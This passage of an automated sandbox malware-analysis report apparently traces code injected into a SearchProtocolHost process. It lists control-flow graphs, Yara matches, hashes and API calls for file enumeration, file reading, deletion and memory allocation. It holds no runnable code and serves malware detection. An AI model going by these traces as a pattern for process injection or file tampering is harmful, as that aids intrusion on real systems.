102078->102081 102079 9fc968 FindNextFileW 102080 9fc97a FindClose 102079->102080 102079->102081 102080->102076 102081->102079

                                                    Executed Functions

                                                    Function 009E9EA0 Relevance: 36.7, Strings: 29, Instructions: 463COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 27 9e9ea0-9ea328 28 9ea339-9ea345 27->28 29 9ea35d-9ea36e 28->29 30 9ea347-9ea350 28->30 33 9ea37f-9ea388 29->33 31 9ea35b 30->31 32 9ea352-9ea355 30->32 31->28 32->31 35 9ea39f-9ea3b0 33->35 36 9ea38a-9ea39d 33->36 37 9ea3c1-9ea3cd 35->37 36->33 39 9ea3cf-9ea3e1 37->39 40 9ea3e3 37->40 39->37 41 9ea3ea-9ea3f3 40->41 43 9ea3f9-9ea403 41->43 44 9ea775-9ea77c 41->44 45 9ea414-9ea420 43->45 46 9ea77e-9ea789 44->46 47 9ea7b2-9ea7b9 44->47 48 9ea422-9ea431 45->48 49 9ea433-9ea43d 45->49 50 9ea78b-9ea78f 46->50 51 9ea790-9ea7b0 46->51 52 9ea7bf call a0b3d0 47->52 53 9ea874-9ea87e 47->53 48->45 55 9ea44e-9ea45a 49->55 50->51 51->44 58 9ea7c4-9ea7ce 52->58 57 9ea88f-9ea89b 53->57 61 9ea45c-9ea46f 55->61 62 9ea471-9ea47b 55->62 59 9ea89d-9ea8af 57->59 60 9ea8b1-9ea8bb 57->60 64 9ea7df-9ea7eb 58->64 59->57 61->55 65 9ea48c-9ea498 62->65 67 9ea7ed-9ea7ff 64->67 68 9ea801-9ea80d 64->68 69 9ea4af-9ea4b9 65->69 70 9ea49a-9ea4ad 65->70 67->64 72 9ea80f-9ea830 68->72 73 9ea832-9ea83c 68->73 74 9ea4da-9ea4ed 69->74 75 9ea4bb-9ea4d8 69->75 70->65 72->68 77 9ea84d-9ea856 73->77 78 9ea4fe-9ea50a 74->78 75->69 77->53 81 9ea858-9ea864 77->81 79 9ea50c-9ea51b 78->79 80 9ea51d-9ea52c 78->80 79->78 82 9ea672-9ea67c 80->82 83 9ea532-9ea539 80->83 85 9ea866-9ea86c 81->85 86 9ea872 81->86 89 9ea67e-9ea698 82->89 90 9ea6b4-9ea6be 82->90 87 9ea53b-9ea56e 83->87 88 9ea570-9ea574 83->88 85->86 86->77 87->83 92 9ea59d-9ea5a7 88->92 93 9ea576-9ea59b 88->93 94 9ea69f-9ea6a1 89->94 95 9ea69a-9ea69e 89->95 96 9ea6cf-9ea6db 90->96 99 9ea5b8-9ea5c4 92->99 93->88 100 9ea6b2 94->100 101 9ea6a3-9ea6ac 94->101 95->94 97 9ea6ee-9ea6f8 96->97 98 9ea6dd-9ea6ec 96->98 103 9ea709-9ea715 97->103 98->96 104 9ea5c6-9ea5d2 99->104 105 9ea5e2-9ea5ec 99->105 100->82 101->100 106 9ea72d-9ea734 103->106 107 9ea717-9ea720 103->107 108 9ea5d4-9ea5da 104->108 109 9ea5e0 104->109 110 9ea5fd-9ea609 105->110 115 9ea766-9ea770 106->115 116 9ea736-9ea764 106->116 113 9ea72b 107->113 114 9ea722-9ea728 107->114 108->109 109->99 111 9ea60b-9ea617 110->111 112 9ea619-9ea623 110->112 111->110 119 9ea626-9ea62f 112->119 113->103 114->113 115->41 116->106 121 9ea645-9ea64c 119->121 122 9ea631-9ea643 119->122 123 9ea64e-9ea66b 121->123 124 9ea66d 121->124 122->119 123->121 124->44
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_9e0000_SearchProtocolHost.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: [$ Z$"|$%$(w$)$1$56f3$H$Hm$K$N\$Qj$OR4"|$R4"|$]$a$d$d9$f3$hy$j$lj$m=hy$n$o$q$v$z$}
                                                    • API String ID: 0-4081740624
                                                    • Opcode ID: 46d82c0d2bf18cc834bd312c91f31a62ec976a17cd6f0789187a3983fb249b13
                                                    • Instruction ID: 933b0e1874ae5c5a288c043b60655a1e536d7b76033c9abbd6b16c494cef25ea
                                                    • Opcode Fuzzy Hash: 46d82c0d2bf18cc834bd312c91f31a62ec976a17cd6f0789187a3983fb249b13
                                                    • Instruction Fuzzy Hash: 4142ABB0905268CBEB65CF45C894BDDBBB1BB45308F2085DAC40D7B291CBB96EC98F51
                                                    Function 009FC860 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileW.KERNELBASE(?,00000000), ref: 009FC938
                                                    • FindNextFileW.KERNELBASE(?,00000010), ref: 009FC973
                                                    • FindClose.KERNELBASE(?), ref: 009FC97E
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_9e0000_SearchProtocolHost.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Find$File$CloseFirstNext
                                                    • String ID:
                                                    • API String ID: 3541575487-0
                                                    • Opcode ID: d89848fe7256e9ce5e025eda469e0519624b9d75b2f5e6b32e4613596c328191
                                                    • Instruction ID: 0f3489cec27dd7aeb06b0dcbc1735f26321a8dc71172af953e5d14e4469d81db
                                                    • Opcode Fuzzy Hash: d89848fe7256e9ce5e025eda469e0519624b9d75b2f5e6b32e4613596c328191
                                                    • Instruction Fuzzy Hash: 6A3150B190024CBBDB21DFA4CD85FFE777CEF84744F148459B948A71C1DAB0AA848BA0
                                                    Function 00A093A0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00A094A1
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_9e0000_SearchProtocolHost.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: d55cf91759196bf18ac3fda808b7da1411fa9cc5a05f4d33fcbe879a96a2afb3
                                                    • Instruction ID: 1acf93ca97001694e9e0b65a16d7f2cae0ee21d9e55ada8f65009e89f5df9a81
                                                    • Opcode Fuzzy Hash: d55cf91759196bf18ac3fda808b7da1411fa9cc5a05f4d33fcbe879a96a2afb3
                                                    • Instruction Fuzzy Hash: 1E31D6B5A01248AFCB14DF98D881EDFB7B9EF8C304F108219F918A3340D730A951CBA5
                                                    Function 00A09510 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00A095F9
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_9e0000_SearchProtocolHost.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 008ae1cd979c5dd922d3da6ceb314d723fd3473bbf4367fba8781d2feef65871
                                                    • Instruction ID: 62f4d32264dfcfbe15005ec0ef9417ebe03538db594ccdf9e3d6bcae55f2d37d
                                                    • Opcode Fuzzy Hash: 008ae1cd979c5dd922d3da6ceb314d723fd3473bbf4367fba8781d2feef65871
                                                    • Instruction Fuzzy Hash: 2531E9B5A00208AFCB14DF99D881EEFB7B9EF88304F108209F918A3341D770A951CFA5
                                                    Function 00A09820 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtAllocateVirtualMemory.NTDLL(009F2088,?,00A0816F,00000000,00000004,00003000,?,?,?,?,?,00A0816F,009F2088,10458B0C,009F2088,00000000), ref: 00A098E8
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_9e0000_SearchProtocolHost.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateMemoryVirtual
                                                    • String ID:
                                                    • API String ID: 2167126740-0
                                                    • Opcode ID: d35709bc92f01a1c6c3088e0d00430d9e238462b21be05e3067fd54b4be63693
                                                    • Instruction ID: b3cdf07de8119332bfff8cefa13a752f61593fb7f1c2250949c0a080b8e10101
                                                    • Opcode Fuzzy Hash: d35709bc92f01a1c6c3088e0d00430d9e238462b21be05e3067fd54b4be63693
                                                    • Instruction Fuzzy Hash: BF212DB5A00649AFDB14DF98DC41EEF77B9EF88304F00850AF918A7381D770A951CBA1
                                                    Function 00A09610 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_9e0000_SearchProtocolHost.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DeleteFile
                                                    • String ID:
                                                    • API String ID: 4033686569-0
                                                    • Opcode ID: a16a95abcbffbf5d145a8d9bc3aaada73f347d3dc5252d097396534119c79234
                                                    • Instruction ID: c58286a156882120377dc4b0d047f9c98fdafd1423a031fd20e88c563575adcb
                                                    • Opcode Fuzzy Hash: a16a95abcbffbf5d145a8d9bc3aaada73f347d3dc5252d097396534119c79234
                                                    • Instruction Fuzzy Hash: 3711A071600648BFD720EBA5DC02FEF776CDF84304F008509F94867281E7717A558BA6
                                                    Function 00A096B0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00A096E4
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_9e0000_SearchProtocolHost.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: 0972272d2523aad39672e0d6cd6478e3c5c68d2fec25f3726e41a2152dbfdc4c
                                                    • Instruction ID: 30e9459bd110f69639c7748841681c07fa392c08e0402cdec310d9829c3bdc58
                                                    • Opcode Fuzzy Hash: 0972272d2523aad39672e0d6cd6478e3c5c68d2fec25f3726e41a2152dbfdc4c
                                                    • Instruction Fuzzy Hash: A8E08C362103447BC620FA6ADC01FAB776CEFC5794F00451AFA08A7282D771B90187F1
                                                    Function 03554340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 0c42f43bf2222fba01bd5c29eb086866dd7681f8c01a4b282a90688d626bf97f
                                                    • Instruction ID: de56682de6b5d3ce8f925cafd4abf8f655f6b0bdf2894e78edc892590fb736d8
                                                    • Opcode Fuzzy Hash: 0c42f43bf2222fba01bd5c29eb086866dd7681f8c01a4b282a90688d626bf97f
                                                    • Instruction Fuzzy Hash: 70900271705804129140B1585C845464045A7E0311B59C011E8424655C8B148A565361
                                                    Function 03554650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 16e154e45ef026faa2ea2919e516be16e0420b8497e3efa124976c68b888ffef
                                                    • Instruction ID: aef9c3c003b2b6be4152ef9ac7deb9dc2a099abcc97aaaf6d9118b0bae750ee4
                                                    • Opcode Fuzzy Hash: 16e154e45ef026faa2ea2919e516be16e0420b8497e3efa124976c68b888ffef
                                                    • Instruction Fuzzy Hash: C09002A1701504424140B1585C044066045A7E1311399C115A8554661C871889559269
                                                    Function 03552B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: a44fc09d0d57f0f6907a84f9369cd2f08980d3004188d958f0d7f3da53b24f09
                                                    • Instruction ID: d8f1b46f89c21a7cd3d449fdcbd08d8e7c04477f4da068578f528b561e60f2a9
                                                    • Opcode Fuzzy Hash: a44fc09d0d57f0f6907a84f9369cd2f08980d3004188d958f0d7f3da53b24f09
                                                    • Instruction Fuzzy Hash: 8B9002A1302404034105B1585814616404A97E0211B59C021E9014691DC62589916125
                                                    Function 03552BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 50294853982fca8345384628c898ace4f5ca6af1bb44634352b81326f82008eb
                                                    • Instruction ID: 6890822d5e708b24d98df67291b81822bd9b6333860144da50153ec9361f9d51
                                                    • Opcode Fuzzy Hash: 50294853982fca8345384628c898ace4f5ca6af1bb44634352b81326f82008eb
                                                    • Instruction Fuzzy Hash: E890027130140C02D180B158580464A004597D1311F99C015A8025755DCB158B5977A1
                                                    Function 03552BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 520a7c07090cc4adef5a25d376296521e6b3f074f7f9a237b8cf4d0afa2dc204
                                                    • Instruction ID: bc95076ddb9a220581e42ebedda82283fe26e5894bd66f7d5146f4f1edcd6b7e
                                                    • Opcode Fuzzy Hash: 520a7c07090cc4adef5a25d376296521e6b3f074f7f9a237b8cf4d0afa2dc204
                                                    • Instruction Fuzzy Hash: 9E90027130544C42D140B1585804A46005597D0315F59C011A8064795D97258E55B661
                                                    Function 03552BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 778d3d79d3c4711ebbe0b0b01f9f16402326e828eee0740e383665cb37391388
                                                    • Instruction ID: 25c6b60ea163f14ac48c126af4b160af33c2e26b3cd46b66591f41a5c08edfd0
                                                    • Opcode Fuzzy Hash: 778d3d79d3c4711ebbe0b0b01f9f16402326e828eee0740e383665cb37391388
                                                    • Instruction Fuzzy Hash: F690027170540C02D150B1585814746004597D0311F59C011A8024755D87558B5576A1
                                                    Function 03552AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 370c5ae0fd802c6203e34d96ca8b997507cc60ccc9662ff9a9c0d89d674143c1
                                                    • Instruction ID: a270c4b645481ecb8b80a6672150b1502083afaf8816971c3efc6e3a25d54972
                                                    • Opcode Fuzzy Hash: 370c5ae0fd802c6203e34d96ca8b997507cc60ccc9662ff9a9c0d89d674143c1
                                                    • Instruction Fuzzy Hash: 07900475311404030105F55C1F0450700C7D7D537135DC031FD015751CD731CD715131
                                                    Function 03552AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 4d3f15b22d865348ace4403a5b8b1cef6de03164401e6a4b7e9e355b7fcdd5a3
                                                    • Instruction ID: dced1538995ed0a774158668d4a3cc32539f9fc6a9a667c3b5476f84de1df91c
                                                    • Opcode Fuzzy Hash: 4d3f15b22d865348ace4403a5b8b1cef6de03164401e6a4b7e9e355b7fcdd5a3
                                                    • Instruction Fuzzy Hash: 02900265321404020145F5581A0450B0485A7D6361399C015F9416691CC72189655321
                                                    Function 03552F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: f11a37319f9435fd45c5665d246ddd5f8db456e245dd643bd2755caab24882e5
                                                    • Instruction ID: fbcb8319d763101bf22d9bd124ec298273cf22ab97e5c33d060c046d7933ae26
                                                    • Opcode Fuzzy Hash: f11a37319f9435fd45c5665d246ddd5f8db456e245dd643bd2755caab24882e5
                                                    • Instruction Fuzzy Hash: 729002A134140842D100B1585814B060045D7E1311F59C015E9064655D8719CD526126
                                                    Function 03552FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 68a73311424af5ff1a6e3d5285be04edb03922d3a447ad8610b706fda8932801
                                                    • Instruction ID: 6fbc1cfa09afa96441598ebe68df3311fe52b5e64b676fb6385d7e42f748c4ad
                                                    • Opcode Fuzzy Hash: 68a73311424af5ff1a6e3d5285be04edb03922d3a447ad8610b706fda8932801
                                                    • Instruction Fuzzy Hash: E0900261311C0442D200B5685C14B07004597D0313F59C115A8154655CCA1589615521
                                                    Function 03552FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 3cc27085d7e1e0ff0812cf78160d34e2ffd075d9c16561362299605d231867e1
                                                    • Instruction ID: 241a4c679739d24fde90559e23fb864424f9ff7a677aaeff0daf17c1671a9307
                                                    • Opcode Fuzzy Hash: 3cc27085d7e1e0ff0812cf78160d34e2ffd075d9c16561362299605d231867e1
                                                    • Instruction Fuzzy Hash: 72900261701404424140B1689C449064045BBE1221759C121A8998651D865989655665
                                                    Function 03552EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 6d1fb4b106a7aca851679ce1aeec493d3a848066328450b7e8cf696150fdc31a
                                                    • Instruction ID: f84d8a4b70eecbd18b6e2092d882f70e7e3e3ac1a0add3a5c845ebdf50934a9c
                                                    • Opcode Fuzzy Hash: 6d1fb4b106a7aca851679ce1aeec493d3a848066328450b7e8cf696150fdc31a
                                                    • Instruction Fuzzy Hash: 789002A130180803D140B5585C04607004597D0312F59C011AA064656E8B298D516135
                                                    Function 03552E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 6db27a85e17d6fb8c5c68ec23aef9b480409110ed761ee74a62868f2b69ebe50
                                                    • Instruction ID: fda6ab372e91c17896f293c7ea70a6ed6cf04c24480aecf996355b3e89e3161f
                                                    • Opcode Fuzzy Hash: 6db27a85e17d6fb8c5c68ec23aef9b480409110ed761ee74a62868f2b69ebe50
                                                    • Instruction Fuzzy Hash: E590026170140902D101B1585804616004A97D0251F99C022A9024656ECB258A92A131
                                                    Function 03552D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 52e6b1196eed05014020a580595ad8606e9b5b4823d1d8458d17b35b9eba9a93
                                                    • Instruction ID: 2ad1fef6eb54c7f92aacbb188052bf7e8d92cb6871f71946f20d2dce73da33ad
                                                    • Opcode Fuzzy Hash: 52e6b1196eed05014020a580595ad8606e9b5b4823d1d8458d17b35b9eba9a93
                                                    • Instruction Fuzzy Hash: BD90026931340402D180B158680860A004597D1212F99D415A8015659CCA1589695321
